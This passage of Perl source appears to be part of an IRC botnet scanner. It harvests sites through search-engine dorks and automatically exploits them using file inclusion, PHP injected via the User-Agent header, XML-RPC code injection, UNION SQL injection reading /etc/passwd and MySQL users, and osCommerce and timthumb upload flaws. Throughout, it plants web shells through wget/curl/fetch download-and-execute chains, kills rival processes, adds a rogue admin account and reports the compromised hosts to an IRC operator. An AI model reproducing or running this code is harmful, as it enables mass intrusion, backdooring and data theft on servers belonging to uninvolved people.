667. &type($chan,$bug,$dork,"LyGo",$type);
668. } exit; }
669. }
670.  
671. if ($engine =~ /yause/i) {
672. if ($pid = fork) { waitpid($pid, 0); }
673. else { if (fork) { exit; } else {
674. &type($chan,$bug,$dork,"YauSe",$type);
675. } exit; }
676. }
677.  
678. if ($engine =~ /baidu/i) {
679. if ($pid = fork) { waitpid($pid, 0); }
680. else { if (fork) { exit; } else {
681. &type($chan,$bug,$dork,"BaiDu",$type);
682. } exit; }
683. }
684.  
685. if ($engine =~ /kipot/i) {
686. if ($pid = fork) { waitpid($pid, 0); }
687. else { if (fork) { exit; } else {
688. &type($chan,$bug,$dork,"KiPoT",$type);
689. } exit; }
690. }
691.  
692. if ($engine =~ /gibla/i) {
693. if ($pid = fork) { waitpid($pid, 0); }
694. else { if (fork) { exit; } else {
695. &type($chan,$bug,$dork,"GiBLa",$type);
696. } exit; }
697. }
698.  
699. if ($engine =~ /black/i) {
700. if ($pid = fork) { waitpid($pid, 0); }
701. else { if (fork) { exit; } else {
702. &type($chan,$bug,$dork,"BLacK",$type);
703. } exit; }
704. }
705.  
706. if ($engine =~ /onet/i) {
707. if ($pid = fork) { waitpid($pid, 0); }
708. else { if (fork) { exit; } else {
709. &type($chan,$bug,$dork,"oNeT",$type);
710. } exit; }
711. }
712.  
713. if ($engine =~ /sizuka/i) {
714. if ($pid = fork) { waitpid($pid, 0); }
715. else { if (fork) { exit; } else {
716. &type($chan,$bug,$dork,"SiZuka",$type);
717. } exit; }
718. }
719.  
720. if ($engine =~ /walla/i) {
721. if ($pid = fork) { waitpid($pid, 0); }
722. else { if (fork) { exit; } else {
723. &type($chan,$bug,$dork,"WaLLa",$type);
724. } exit; }
725. }
726.  
727. if ($engine =~ /demos/i) {
728. if ($pid = fork) { waitpid($pid, 0); }
729. else { if (fork) { exit; } else {
730. &type($chan,$bug,$dork,"DeMos",$type);
731. } exit; }
732. }
733.  
734. if ($engine =~ /rose/i) {
735. if ($pid = fork) { waitpid($pid, 0); }
736. else { if (fork) { exit; } else {
737. &type($chan,$bug,$dork,"RoSe",$type);
738. } exit; }
739. }
740.  
741. if ($engine =~ /seznam/i) {
742. if ($pid = fork) { waitpid($pid, 0); }
743. else { if (fork) { exit; } else {
744. &type($chan,$bug,$dork,"SeZnaM",$type);
745. } exit; }
746. }
747.  
748. if ($engine =~ /tiscali/i) {
749. if ($pid = fork) { waitpid($pid, 0); }
750. else { if (fork) { exit; } else {
751. &type($chan,$bug,$dork,"TisCali",$type);
752. } exit; }
753. }
754.  
755. if ($engine =~ /naver/i) {
756. if ($pid = fork) { waitpid($pid, 0); }
757. else { if (fork) { exit; } else {
758. &type($chan,$bug,$dork,"NaVeR",$type);
759. } exit; }
760. }
761. }
762.  
763. #########################################
764.  
765. sub rfi() {
766. my $chan = $_[0];
767. my $bug = $_[1];
768. my $dork = $_[2];
769. my $engine = $_[3];
770. my $count = 0;
771. my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
772. my $num = scalar(@list);
773. if ($num > 0) {
774. foreach my $site (@list) {
775. $count++;
776. if ($count == $num-1) { &msg("$chan","$rfilogo(4@9$engine15)10 Scan finish"); }
777. my $coba = "http://".$site.$bug."test??";
778. my $test = "http://".$site.$bug.$injector."??";
779. my $dor = "http://".$site.$bug.$botshell."??";
780. my $dor2 = "http://".$site.$bug.$botshell2."??";
781. my $cek = &get_content($coba);sleep(1);
782. &get_content($dor);sleep(1);
783. &get_content($dor2);sleep(1);
784. if ($cek =~ /failed to open stream/i) {
785. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
786. &rfi_xpl($test,$chan,$site);
787. exit;}
788. }
789. }
790. }
791. }
792. }
793.  
794. sub rfi_xpl() {
795. my $url = $_[0];
796. my $chan = $_[1];
797. my $site = $_[2];
798. my $dor = $url.$botshell."??";
799. my $dor2 = $url.$botshell2."??";
800. my $test = $url.$injector."??";
801. my $vuln = $url."14(ByroeNet)";
802. my $check = &get_content($test);
803. &get_content($dor);sleep(1);
804. &get_content($dor2);sleep(1);
805. if ( $check =~ /JANCOK- exploit/i ) {
806. my $safe ="";
807. my $os ="";
808. my $free ="";
809. if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
810. if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
811. if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
812. if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
813. &msg("$chan","$rfilogo(4@9VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)(4@9safemode-off15)");
814. &msg("$admin","$rfilogo(4@9VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");
815. }
816. else {&msg("$chan","$rfilogo(4@9VuLn15)10 ".$vuln." (4@7safemode-on15)");}
817. }
818.  
819. sub lfi() {
820. my $chan = $_[0];
821. my $bug = $_[1];
822. my $dork = $_[2];
823. my $engine = $_[3];
824. my $count = 0;
825. my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
826. my $num = scalar(@list);
827. if ($num > 0) {
828. foreach my $site (@list) {
829. $count++;
830. if ($count == $num-1) { &msg("$chan","$lfilogo(4@9$engine15)10 Scan finish"); }
831. my $dir = "../../../../../../../../../../../../../";
832. my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
833. my $vuln = "http://".$site."12".$bug.$dir."/proc/self/environ%0000";
834. my $shell = "http://".$site."12".$bug.$dir."/tmp/ipays%0000";
835. my $html = &get_content($test);
836. if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
837. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
838. my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$injector.'","/tmp/ipays")) { echo "SUCCESS";@copy("'.$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/maza"); }';
839. my $res = lfi_env_query($test,encode_base64($code));
840. &lfi_spread_query($test);
841. &get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
842. &get_content("http://".$site.$bug.$dir."/tmp/maza%0000");
843. $res =~ s/\n//g;
844. if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
845. my $sys = $1;
846. $nob0dy = $2;
847. &msg("$chan","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@9".$sys."15))15(4@9$nob0dy15)");sleep(2);
848. }
849. elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
850. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
851. my $sys = $1;
852. $nob0dy = $2;
853. my $upload = 'system("killall -9 perl;killall -9 php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");passthru("killall -9 perl;killall -9 php;wget '.$injector.' -O aspaltx.php;fetch '.$injector.';mv ipays.jpg aspaltx.php;wget '.$botshell.' -O byroe.php;fetch '.$botshell.';mv byroe.jpg byroe.php;wget '.$botshell2.' -O allnet.php;fetch '.$botshell2.';mv allnet.jpg allnet.php;");';
854. my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
855. my $check = &get_content("http://".$site.$bug.$dir."/tmp/ipays%0000"); sleep(2);
856. &get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
857. &get_content("http://".$site.$bug.$dir."/tmp/maza%0000");sleep(2);
858. if ($check =~ /JANCOK- exploit/) {
859. &msg("$chan","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
860. &msg("$admin","$lfilogo(4@8$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
861. }
862. else {
863. &msg("$chan","$lfilogo(4@8$engine15)15(4@9SysTem15)7 ".$vuln." 15(4@3".$sys."15))15(4@9$nob0dy15)");sleep(2);
864. }
865. } exit; }
866. }
867. else { &msg("$chan","$lfilogo(4@8$engine15)15(4@9EnviRon15)10 ".$vuln); }
868. } exit; } sleep(2);
869. }
870. }
871. }
872. }
873.  
874. sub lfi_env_query() {
875. my $url = $_[0];
876. my $code = $_[1];
877. my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>");
878. $ua->timeout(7);
879. my $req = HTTP::Request->new(GET => $url);
880. my $res = $ua->request($req);
881. return $res->content;
882. }
883.  
884. sub lfi_spread_query() {
885. my $url = $_[0];
886. my $code = "system('cd /tmp;rm -rf allnet.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd /var/tmp;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;rm -rf *.jp*;');";
887. my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64($code)."'));?>");
888. $ua->timeout(7);
889. my $req = HTTP::Request->new(GET => $url);
890. my $res = $ua->request($req);
891. }
892.  
893. sub xml() {
894. my $chan = $_[0];
895. my $bug = $_[1];
896. my $dork = $_[2];
897. my $engine = $_[3];
898. my $count = 0;
899. my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
900. my $num = scalar(@list);
901. if ($num > 0) {
902. foreach my $site (@list) {
903. $count++;
904. if ($count == $num-1) { &msg("$chan","$xmllogo(4@8$engine15)10 Scan finish"); }
905. my $test = "http://".$site.$bug;
906. my $vuln = "http://".$site."13".$bug;
907. my $html = &get_content($test);
908. if ($html =~ /faultCode/ ) {
909. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
910. my $resp = &xml_cek_query($test);
911. if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
912. &xml_spread_query($test);sleep(2);
913. my $sys = $1;
914. my $check = &get_content("http://".$site."aspaltx.php");
915. &get_content("http://".$site."byroe.php");
916. &get_content("http://".$site."allnet.php");
917. if ($check =~ /JANCOK- exploit/) {
918. &msg("$chan","$xmllogo(4@8$engine15)15(13@9SheLL15)13 http://".$site."7aspaltx.php 3".$sys);&get_content("http://".$site."byroe.php"); sleep(2);}
919. else {
920. &msg("$chan","$xmllogo(4@8$engine15)15(4@9SysTem15)7 ".$vuln." 3".$sys); sleep(2);}
921. }
922. sleep(2); } exit; } }
923. }
924. }
925. }
926.  
927. sub xml_cek_query() {
928. my $url = $_[0];
929. my $code = "system('uname -a');";
930. my $ua = LWP::UserAgent->new(agent => 'perl post');
931. $exploit = "<?xml version=\"1.0\"?><methodCall>";
932. $exploit .= "<methodName>test.method</methodName>";
933. $exploit .= "<params><param><value><name>',''));";
934. $exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
935. $ua->timeout(7);
936. my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
937. return $res->content;
938. }
939.  
940. sub xml_spread_query() {
941. my $xmltargt = $_[0];
942. my $xmlsprd = "system('wget ".$injector." -O aspaltx.php;fetch ".$injector.";mv ipays.jpg aspaltx.php;wget ".$botshell." -O byroe.php;fetch ".$botshell.";mv byroe.jpg byroe.php;wget ".$botshell2." -O allnet.php;fetch ".$botshell2.";mv allnet.jpg allnet.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;wget ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;curl -O ".$botshell.";php byroe.jpg;rm -rf byroe.jpg;lwp-download ".$botshell.";php byroe.jpg;fetch ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;wget ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;curl -O ".$botshell2.";php allnet.jpg;rm -rf allnet.jpg;lwp-download ".$botshell2.";php allnet.jpg;');";
943. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
944. $exploit = "<?xml version=\"1.0\"?><methodCall>";
945. $exploit .= "<methodName>test.method</methodName>";
946. $exploit .= "<params><param><value><name>',''));";
947. $exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
948. $userAgent->timeout(7);
949. $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
950. }
951.  
952. sub sql() {
953. my $chan = $_[0];
954. my $bug = $_[1];
955. my $dork = $_[2];
956. my $engine = $_[3];
957. my $count = 0;
958. my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
959. my $num = scalar(@list);
960. if ($num > 0) {
961. foreach my $site (@list) {
962. $count++;
963. if ($count == $num-1) { &msg("$chan","$sqllogo(4@8$engine15)10 Scan finish"); }
964. my $test = "http://".$site.$bug."'";
965. my $vuln = "http://".$site."4".$bug;
966. my $sqlsite = "http://".$site.$bug;
967. my $html = &get_content($test);
968. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
969. if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
970. &sqlbrute($sqlsite,$chan,$engine);}
971. elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
972. &msg("$chan","$sqllogo(4@8$engine15)15(4@9MsSQL15)13 ".$vuln);}
973. elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
974. &msg("$chan","$sqllogo(4@8$engine15)15(4@9MsAccess15)13 ".$vuln);}
975. elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
976. &sqlbrute($sqlsite,$chan,$engine);}
977. } exit; sleep(2); }
978. }
979. }
980. }
981. sub sqlbrute() {
982. my $situs=$_[0];
983. my $chan =$_[1];
984. my $engine=$_[2];
985. my $columns=20;
986. my $cfin.="--";
987. my $cmn.= "+";
988. for ($column = 0 ; $column < $columns ; $column ++)
989. {
990. $union.=','.$column;
991. $inyection.=','."0x6c6f67696e70776e7a";
992. if ($column == 0)
993. {
994. $inyection = '';
995. $union = '';
996. }
997. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
998. $response=get($sql);
999. if($response =~ /loginpwnz/)
1000. {
1001. $column ++;
1002. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
1003. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)13 $sql ");
1004. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
1005. $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
1006. if($response =~ /loginpwnz/)
1007. {
1008. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
1009. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13INFO_SCHEMA15)13 $sql ");
1010. }
1011. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
1012. $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
1013. if($response =~ /loginpwnz/)
1014. {
1015. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
1016. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13USER15)13 $sql ");
1017. }
1018. else
1019. {
1020. }
1021. while ($loadcont < $column-1)
1022. {
1023. $loadfile.=','.'load_file(0x2f6574632f706173737764)';
1024. $loadcont++;
1025. }
1026. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
1027. $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
1028. if($response =~ /root:x:/)
1029. {
1030. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13Load File15)13 $sql ");
1031. }
1032. else
1033. {
1034. }
1035. foreach $tabla(@tabele)
1036. {
1037. chomp($tabla);
1038. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
1039. $response=get($sql)or die("[-] Impossible to get tables\n");
1040. if($response =~ /loginpwnz/)
1041. {
1042. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
1043. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13Tabel15)13 $sql ");
1044. &tabelka($situs,$tabla,$chan,$engine);
1045. }
1046. }
1047. }
1048. }
1049. }
1050.  
1051. sub tabelka() {
1052. my $situs =$_[0];
1053. my $tabla =$_[1];
1054. my $chan =$_[2];
1055. my $engine=$_[3];
1056. my $cfin.="--";
1057. my $cmn.= "+";
1058. chomp($tabla);
1059. foreach $columna(@kolumny)
1060. {
1061. chomp($columna);
1062. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
1063. $response=get($sql)or die("[-] Impossible to get columns\n");
1064. if ($response =~ /loginpwnz/)
1065. {
1066. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13SQLi Vuln15)9 $situs 14(4@13Kolom14)13 $columna 14(4@13Tabel14)13 $tabla ");
1067. }
1068. }
1069.  
1070. }
1071.  
1072. sub osco() {
1073. my $chan = $_[0];
1074. my $bug = $_[1];
1075. my $dork = $_[2];
1076. my $engine = $_[3];
1077. my $count = 0;
1078. my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
1079. my $num = scalar(@list);
1080. if ($num > 0) {
1081. foreach my $site (@list) {
1082. $count++;
1083. if ($count == $num-1) { &msg("$chan","$oscologo(4@8$engine15)10 Scan finish"); }
1084. my $test = "http://".$site.$bug;
1085. my $html = &get_content($test);
1086. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1087. if ($html =~ /Warning: No file uploaded/ ) {
1088. # &msg("$chan","$oscologo(4@8$engine15)15(4@9System15)7 ".$test);
1089. &osco_xpl($test,$chan,$site,$engine);
1090. } else { }
1091. } exit; sleep(2); }
1092. }
1093. }
1094. }
1095.  
1096. sub osco_xpl() {
1097. my $browser = LWP::UserAgent->new;
1098. my $url = $_[0];
1099. my $chan = $_[1];
1100. my $site = $_[2];
1101. my $engine = $_[3];
1102. my $res = $browser->post( $url,['products_image' => ['./ipays.jpg' => 'bronsx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
1103. my $resa = $browser->post( $url,['products_image' => ['./maza.jpg' => 'aspaltx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
1104. my $resb = $browser->post( $url,['products_image' => ['./byroe.jpg' => 'byroe.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
1105. my $resc = $browser->post( $url,['products_image' => ['./allnet.jpg' => 'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');
1106. my $hasil = $res->as_string;
1107. my $hasil1 = $resa->as_string;
1108. my $hasil2 = $resb->as_string;
1109. my $hasil3 = $resc->as_string;
1110. my $check = &get_content("http://".$site."images/aspaltx.php");&get_content("http://".$site."images/byroe.php");&get_content("http://".$site."images/allnet.html");sleep(3);
1111. if ($check =~ /JANCOK- exploit/) {
1112. my $safe ="";
1113. my $os ="";
1114. my $free ="";
1115. if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
1116. if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
1117. if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
1118. if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
1119. &msg("$chan","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4aspaltx.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
1120. &msg("$admin","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4allnet.html 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
1121. }
1122. }
1123.  
1124. sub osco2() {
1125. my $chan = $_[0];
1126. my $bug = $_[1];
1127. my $dork = $_[2];
1128. my $engine = $_[3];
1129. my $count = 0;
1130. my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
1131. my $num = scalar(@list);
1132. if ($num > 0) {
1133. foreach my $site (@list) {
1134. $count++;
1135. if ($count == $num-1) { &msg("$chan","$oscologo(4@8$engine15)10 Scan finish"); }
1136. my $test = "http://".$site.$bug;
1137. my $html = &get_content($test);
1138. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
1139. if ($html =~ /TABLE_HEADING_FILENAME/ ) {
1140. # &msg("$chan","$oscologo(4@8$engine15)15(4@9System15)7 ".$test);
1141. &osco_xpl2($test,$chan,$site,$engine);
1142. } else { }
1143. } exit; sleep(2); }
1144. }
1145. }
1146. }
1147.  
1148. sub osco_xpl2() {
1149. my $browser = LWP::UserAgent->new;
1150. my $url = $_[0]."?action=processuploads";
1151. my $chan = $_[1];
1152. my $site = $_[2];
1153. my $engine = $_[3];
1154. my $res = $browser->post( $url,['file_1' => ['./ipays.jpg' => 'bronsx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
1155. my $resa = $browser->post( $url,['file_1' => ['./maza.jpg' => 'aspaltx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
1156. my $resb = $browser->post( $url,['file_1' => ['./byroe.jpg' => 'byroe.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
1157. my $resc = $browser->post( $url,['file_1' => ['./allnet.jpg' => 'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');
1158. my $hasil = $res->as_string;
1159. my $hasil1 = $resa->as_string;
1160. my $hasil2 = $resb->as_string;
1161. my $hasil3 = $resc->as_string;
1162. my $check = &get_content("http://".$site."images/aspaltx.php");&get_content("http://".$site."images/byroe.php");&get_content("http://".$site."images/allnet.html");sleep(3);
1163. if ($check =~ /JANCOK- exploits/) {
1164. my $safe ="";
1165. my $os ="";
1166. my $free ="";
1167. if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
1168. if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
1169. if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
1170. if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
1171. &msg("$chan","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4aspaltx.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
1172. &msg("$admin","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4allnet.html 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
1173. }
1174. }
1175.  
1176. sub loko() {
1177. my $chan = $_[0];
1178. my $bug = $_[1];
1179. my $dork = $_[2];
1180. my $engine = $_[3];
1181. my $count = 0;
1182. my @list = &search_engine($chan,$bug,$dork,$engine,$lokologo);
1183. my $num = scalar(@list);
1184. if ($num > 0) {
1185. foreach my $site (@list) {
1186. $count++;
1187. if ($count == $num-1) { &msg("$chan","$lokologo(4@8$engine15)10 Scan finish"); }
1188. my $test = "http://".$site."filemanager/browser.html";
1189. my $vuln = "http://".$site."filemanager/browser.html";
1190. my $re = &get_content($test);
1191. if ($re =~ /$loko_output/){
1192. &msg("$chan", "$lokologo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
1193. }
1194. }
1195. }
1196. }
1197.  
1198. sub op() {
1199. my $chan = $_[0];
1200. my $bug = $_[1];
1201. my $dork = $_[2];
1202. my $engine = $_[3];
1203. my $count = 0;
1204. my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
1205. my $num = scalar(@list);
1206. if ($num > 0) {
1207. foreach my $site (@list) {
1208. $count++;
1209. if ($count == $num-1) { &msg("$chan","$oplogo(4@8$engine15)10 Scan finish"); }
1210. my $test = "http://".$site.$open_test;
1211. my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
1212. my $re = &get_content($test);
1213. if ($re =~ /$open_output/){
1214. &msg("$chan", "$oplogo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
1215. }
1216. }
1217. }
1218. }
1219.  
1220. sub zen() {
1221. my $chan = $_[0];
1222. my $bug = $_[1];
1223. my $dork = $_[2];
1224. my $engine = $_[3];
1225. my $count = 0;
1226. my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
1227. my $num = scalar(@list);
1228. if ($num > 0) {
1229. foreach my $site (@list) {
1230. $count++;
1231. if ($count == $num-1) { &msg("$chan","$zenlogo(4@8$engine15)10 Scan finish"); }
1232. my $test = "http://".$site."admin/record_company.php/password_forgotten.php?action=insert";
1233. my $vuln = "http://".$site."images/4brons.php";
1234. my $que = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56,'adminsys','admin@mazacrew.co.cc','617ec22fbb8f201c366e9848c0eb6925:87');";
1235. my $re = &get_content($vuln);
1236. if ($re =~ /JANCOK- exploit/i){
1237. &msg("$chan", "$zenlogo(4@8$engine15)(4@13Shell15)13 ".$vuln."");
1238. }
1239. else{
1240. # &msg("$chan", "$zenlogo(4@8$engine15)(4@13GaGaL15)4 ".$vuln."15(4@9Ab0rteD15)");
1241. }
1242. }
1243. }
1244. }
1245.  
1246. ######################################### ADDED
1247.  
1248. sub thumb() {
1249. my $chan = $_[0];
1250. my $bug = $_[1];
1251. my $dork = $_[2];
1252. my $engine = $_[3];
1253. my $count = 0;
1254. my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
1255. my $num = scalar(@list);
1256. if ($num > 0) {
1257. foreach my $site (@list) {
1258. $count++;
1259. if ($count == $num-1) { &msg("$chan","$thumblogo(4@9$engine15)10 Scan finish"); }
1260. my $coba = "http://".$site.$bug."timthumb.php?src=".$thumbshell."";
1261. my $cek = &get_content($coba);sleep(1);
1262. my $aa = "cache/c54af1d13e884a4c63da8f3098a7a4da.php";
1263. my $ab = "temp/c54af1d13e884a4c63da8f3098a7a4da.php";
1264. my $ceck1 = "http://".$site.$bug.".$aa";
1265. my $ceck2 = "http://".$site.$bug.".$ab";
1266. my $loco1 = &get_content($ceck1);sleep(1);
1267. my $loco2 = &get_content($ceck2);sleep(1);
1268. if ($cek =~ /tripl3k was Here/i) {
1269. my $vuln = "http://".$site.$bug."cache/c54af1d13e884a4c63da8f3098a7a4da.php";
1270. &msg("$chan", "$thumblogo(4@8$engine15)(4@4VulN15)4 ".$vuln." 15(4@9 0WN3D 15)");
1271. }
1272. }
1273. }
1274. }
1275.  
1276.  
1277.  
1278. #########################################
1279.  
1280. sub search_engine() {
1281. my (@total,@clean);
1282. my $chan = $_[0];
1283. my $bug = $_[1];
1284. my $dork = $_[2];
1285. my $engine = $_[3];
1286. my $logo = $_[4];
1287. if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
1288. if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff); }
1289. if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
1290. if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork); push(@total,@altavista); }
1291. if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
1292. if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
1293. if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
1294. if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty); }
1295. if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser); }
